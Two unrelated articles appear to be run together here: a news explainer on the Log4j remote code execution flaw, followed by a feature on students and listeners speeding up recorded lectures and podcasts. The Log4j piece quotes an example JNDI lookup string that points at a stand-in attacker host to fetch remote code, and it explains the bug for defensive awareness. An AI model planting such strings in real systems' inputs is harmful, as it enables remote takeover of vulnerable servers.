A new software vulnerability in a tool called Log4j has set the internet on fire as experts try to assess the impact and shore up their systems. Dylan Reeve explains the finer details for IRL. 

The latest security issue to sweep the internet has a perfect 10 out of 10 score for badness. That is, the newly discovered vulnerability in Log4j is considered as bad as it gets and may see many cybersecurity experts cancelling Christmas. 

“In the 15 or so years that I’ve been working in cybersecurity, this is probably the worst vulnerability I’ve seen,” said Adam Boileau, executive director of security testing and assurance at cyber security company CyberCX. “It’s one of the most interesting technically. The impact is not yet at the scale of NotPetya or Wannacry … but it will probably exceed them.”

We are constantly surrounded by technology, and it’s all at risk of security flaws. As these flaws are identified, they’re assessed with a Common Vulnerability Scoring System (CVSS) score from 0.1 (Pfft, whatever) to 10 (OMG! Everything is on fire!!).

Security issues with a CVSS score of 10 aren’t that unusual, but they usually pop up in somewhat obscure pieces of software where the impact is limited. They’re also often fixed before anyone even realises they exist. 

But the new Log4j vulnerability is different. Firstly it is a “0-day” vulnerability, meaning the software’s makers have had zero days to fix it: the world found out about it at the same time the developers did. Secondly, it’s very widespread. In fact, it’s so widespread that no one really even knows how many products and services are affected. 

It is basically a worst case scenario: a very dangerous vulnerability, spread widely and being actively exploited right away.

In cybersecurity nerd speak, the Log4j bug is a remote code execution vulnerability. In short, this means someone (an attacker) can exploit a bug in the software to cause a program of their own design to run on a remote computer system or device. Once you can run your code on someone else’s computer, you can do pretty much anything you want.

But taking it back a couple of steps, it’s useful to understand why Log4j, a software tool almost no one had heard of a week ago, is suddenly so critical.

Log4j is a software library — essentially a pre-made piece of computer code that can be incorporated into software by programmers to help them add functionality without having to reinvent the wheel. In this case it’s a library for logging, which is a very important aspect of programming. Log4j is a logging library for the Java programming language — Log4j = “logging for Java”, see? — that has been used by almost all Java programmers for years. Logging allows a programmer to have their software generate a “log file” which contains important information about, for example, what user logged in, and when; what files were sent and received; what errors were encountered. 

All these logs are necessary to help users keep track of what the software is doing, and they also help developers figure out problems that have occurred with the software when it’s being used. 

The bug in Log4j comes thanks to a feature in the library that allows it to parse special instructions in the log messages. One of these special instructions can be used to tell the library to contact an external server in order to get additional information. It’s a fairly niche feature that most of the programmers using Log4j would never have even known about, but it meant that, in theory, anyone could potentially force this logging library, embedded deep inside countless programs, to reach out to the internet and get a piece of data.

Anytime Log4j is told to log a specially formatted piece of text —“${jndi:ldap://dangerous.zyx/code}”, for example — it parses that as an instruction to contact a remote server in order to receive a piece of information. It will reach out to the server, dangerous.zyx in this case, and ask it for /code. It will then process whatever response it gets. If you, as an attacker, control the domain name dangerous.zyx then you can send back instructions that will be carried out by whatever computer the message was logged on. 

Because software tends to do a lot of logging, something as simple as a carefully constructed username may be enough to trigger exploitation, or even just typing the special instruction in chat. If you can access a server or piece of software at all, there’s a good chance you can get it to log some piece of information you provide.

The other complication with this vulnerability is just how widely used Java is, and thus how widespread Log4j is. Java is very common in complex business applications, servers and even the software that runs inside hardware devices like modems, kitchen appliances and printers. Even software that isn’t written in Java may rely on services or components that are. There are examples of this vulnerability being present in countless places including Facebook, Apple’s iCloud, Minecraft and even devices like smart watches, cars and connected appliances.

Even systems that don’t include any Java themselves may still present a vulnerability to this bug. “In many situations, messages from one part of a business system are passed on to other systems,” explained CyberCX’s Boileau. “We’ve seen cases where a front end system wasn’t vulnerable, but it reported data into an internal database, which also wasn’t vulnerable, but then that data was later displayed in a desktop application that was vulnerable.” 

Every piece of software or hardware will have its own specific risks, and the process for determining risk can be complicated and time consuming. Various simple tests have been created, but the results won’t always be definitive and often further investigation or fixes will be necessary before any given system or device can be given a clean bill of health.

The big names, like Facebook, Google, IBM, Microsoft and Apple, acted within hours to mitigate potential harms within their core services. But for thousands of other software applications, the fixes may be a long time coming, and for millions of vulnerable hardware devices it’s possible a fix will never come. 

While this bug poses huge risks to corporate and enterprise customers, the risk to home users is probably more limited, according to Boileau. “Java hasn’t been popular in home computing for a while,” he said. “Most people with a modern computer probably aren’t going to be using much Java. Minecraft is the most obvious exception.” That’s right gamers, your Minecraft is possibly at risk.

However, as always, the advice to frequently update software remains a key first step in staying secure.

Less than a week into this specific security issue, it’s still unclear what potential harms could be waiting or how widely the impact will ultimately be felt, but many experts seem to think things will get worse in the coming weeks. It’s also likely that this flaw will have a very long tail, with many programs and devices even remaining vulnerable until they’re eventually scrapped entirely one day.

According to Boileau, most large enterprises and government agencies in New Zealand are already in the process of assessing and mitigating their risk. For smaller businesses, without dedicated IT and cybersecurity teams, his advice is to pay attention to the evolving advice. “There will be specific advice coming out frequently over the next few weeks or months about what products are at risk of being attacked, and what should be done,” he said. “Smaller businesses should be watching those closely and doing what they can to take whatever steps are recommended.” 

“If you know you have a Java application that isn’t critical, just turn it off,” Boileau added.

For IRL, Shanti Mathias discovers what’s gained and lost when you listen to your podcasts, YouTube videos and recorded lectures at double speed. 

I knew, even in that moment, that this was probably not an effective way to learn. But it was my first year of university, I’d been away for a few weeks, and I had some lectures to catch up on. It was early spring, and I also had to wax my legs. 

Picture this absurd situation: one leg balanced on the sink covered in sticky wax, laptop tucked behind the tap, notebook stabilised on the keyboard, pen askew – and a recorded anthropology lecture playing at two times the original speed. Rip a strip of hair, pause the lecture to scrawl down something that seemed important, press play, words about participant observation and historical materialism made blurry. I have a piece of paper that says I have a qualification in anthropology, but choosing to watch several weeks of foundational lectures sped up while doing other activities is probably why I still couldn’t tell you the difference between Malinowski and Mead. 

In the age of Covid, where remote learning is becoming the norm, speeding up lectures on platforms like Panopto is a common practice among time-pressed students. But the fast-forward feature is found on many online platforms, including YouTube and most podcast apps – and I’m not the only one who uses it.

One way to understand the motivation to speed things up is as a consequence of capitalism. In the US, cable TV channels were found to be speeding reruns of shows like Seinfield up by small amounts to fit more ad breaks into a half hour slot. “It’s the acceleration of modern life,” says Greg O’Beirne, a professor of audiology at the University of Canterbury. “People like to take control of their information.” 

More than 500 hours of video are uploaded to YouTube every minute, not to mention the video and audio on every other website. In this avalanche of content, going at 1.5 or double speed lets you watch a few more videos, listen to a few more podcasts.  

Speeding content up is theoretically more efficient for the time poor. “Since I have to work part time during uni, it’s a more efficient use of my time to speed through a 50 minute lecture in 25 minutes so I can go to work,” says Boston Flanagan-Connors, a law student living in Wellington. Flanagan-Connors watches most of his lectures sped up, and finds it a particularly useful revision tool – he watches back accelerated videos of lectures he attended in person to refresh his memory.

“Lectures go really slowly,” says Aden Jowsey, a masters student in Pōneke. Watching recorded lectures at speed was his gateway; he now watches four hours of YouTube a day at double speed. For Jowsey, this is recreational: the fast forward feature speeds the slow pace of competitive chess, allows him to watch video gamers sprint through challenges, and further compresses the already condensed wisdom of Ted talks.  

Does speeding content come at the cost of comprehension, though? “When I hear [that my students speed up their lectures] I feel a little worried,” says Sasha Calhoun, a senior lecturer in linguistics at Victoria University of Wellington. Calhoun studies prosody, or the role of rhythm and intonation in language.

I ask her what effect speed has on the information contained in language. “Length [of sound] is used for emphasis,” she says. Dragging out a sound draws the listener’s attention to it, indicating that the information in that sound is more important. When the sound you’re listening to is sped up, it’s harder to distinguish what matters – another reason I may have failed to absorb my high-speed anthropology lectures. 

That said, “some of the algorithms give excellent results,” O’Beirne says. In the last two decades, audio technology has advanced so sound can be accelerated without high-pitched distortion. While the exact algorithms vary, O’Beirne says sites like YouTube or Panopto will find the repeated sounds and overlap the audio, so the transitions are quicker, but the proportion of time a sound takes remains the same. 

These intelligent algorithms are doing something that people cannot. “The limitation that humans have that machines don’t is just how quickly our tongues and teeth can move – there’s a speed limit on our speech production,” Calhoun says. 

But is there a speed limit on comprehension? O’Beirne notes that human reading speed – just your eyes and brain converting letters to meaning – is much faster than speech. While reading, human brains can absorb information at more than 300 words per minute, while normal speaking speed is 140 to 190 words per minute. Lectures and podcasts, which are often more clearly enunciated and structured than casual conversation, can be sped up without any drop in comprehension, up to a point. “After 315 words per minute, you may feel like you’re absorbing more information, but you’re not taking it all in,” O’Beirne says.

Retention of information also depends on how much attention you’re paying. “Any distortion in speech signal reduces intelligibility and increases the amount of effort you have to put in as a listener,” O’Beirne continues. “If you’re listening at a slow speed and your mind drifts, you can use context to fill the gaps.” If the sound is sped up, this is a problem: “You have to dedicate all your cognitive resources to decoding [and] be totally focused.” In other words, it is of course possible to listen to accelerated anthropology lectures while waxing your legs, but don’t make the mistake I did in expecting to learn anything. 

The human brain is remarkably adaptive, Calhoun says. “As we listen, we take in information about the social situation, contextual clues, emotional clues, [but] as we speed up the depth of processing goes down because we can’t spend as many cognitive resources [on noticing these things].” Sped-up audio reduces the ability to process information as you go, and conveying information on screens or speakers also reduces the social context that makes memories stick. 

Calhoun and O’Beirne are invested in the questions of language, learning, and listening that sped-up content raises. For day-to-day information consumers, however, these concerns are less pressing than a far more noticeable side-effect: it makes recorded voices speaking at regular speed sound absurd. “Once you go to two times [speed], you can’t go back,” says Jowsey. “The voices change, [normal speed] sounds too slow.” 

At this point, 1.25 times increased speed sounds relaxing to me, even normal. Walking into a room where I’m playing a podcast, my flatmates will ask why I’m speeding it up and I find myself almost ashamed that I can’t even notice a difference. 

What’s the line? Is any art sacred? “People would be horrified if they knew we were speeding things up, when they put a lot of effort in,” says O’Beirne, who often speeds up audiobooks to compensate for slow narrators. 

“[Speed] ruins the enjoyment for me,” says Flanagan-Connors. “I use it purely for information gathering, when I want to know the answer as quickly as possible.” He wouldn’t dream of speeding up TV, although some streaming sites offer this feature. 

“I’m worried it’s not healthy,” says Jowsey, who nonetheless would recommend that others try speeding content up – he enjoys the commentary and tension of the chess world championships just as much at double speed. “I want to give my heartfelt thanks to whatever engineer or software designer … thought to add a speed multiplier. You are a genius, you are an innovator well beyond your time.” 

Flanagan-Connors, who has at least another year of law lectures to absorb, echoes Jowsey’s praise. “Whoever came up with the tech is my hero,” he says.

In this case, the fast-paced modern world is quite literally faster; most people can make the content they watch and listen to go more quickly if they want. But not everything can be adjusted. “Tell you what – I wish I could write my masters at two times speed,” says Jowsey, laughing.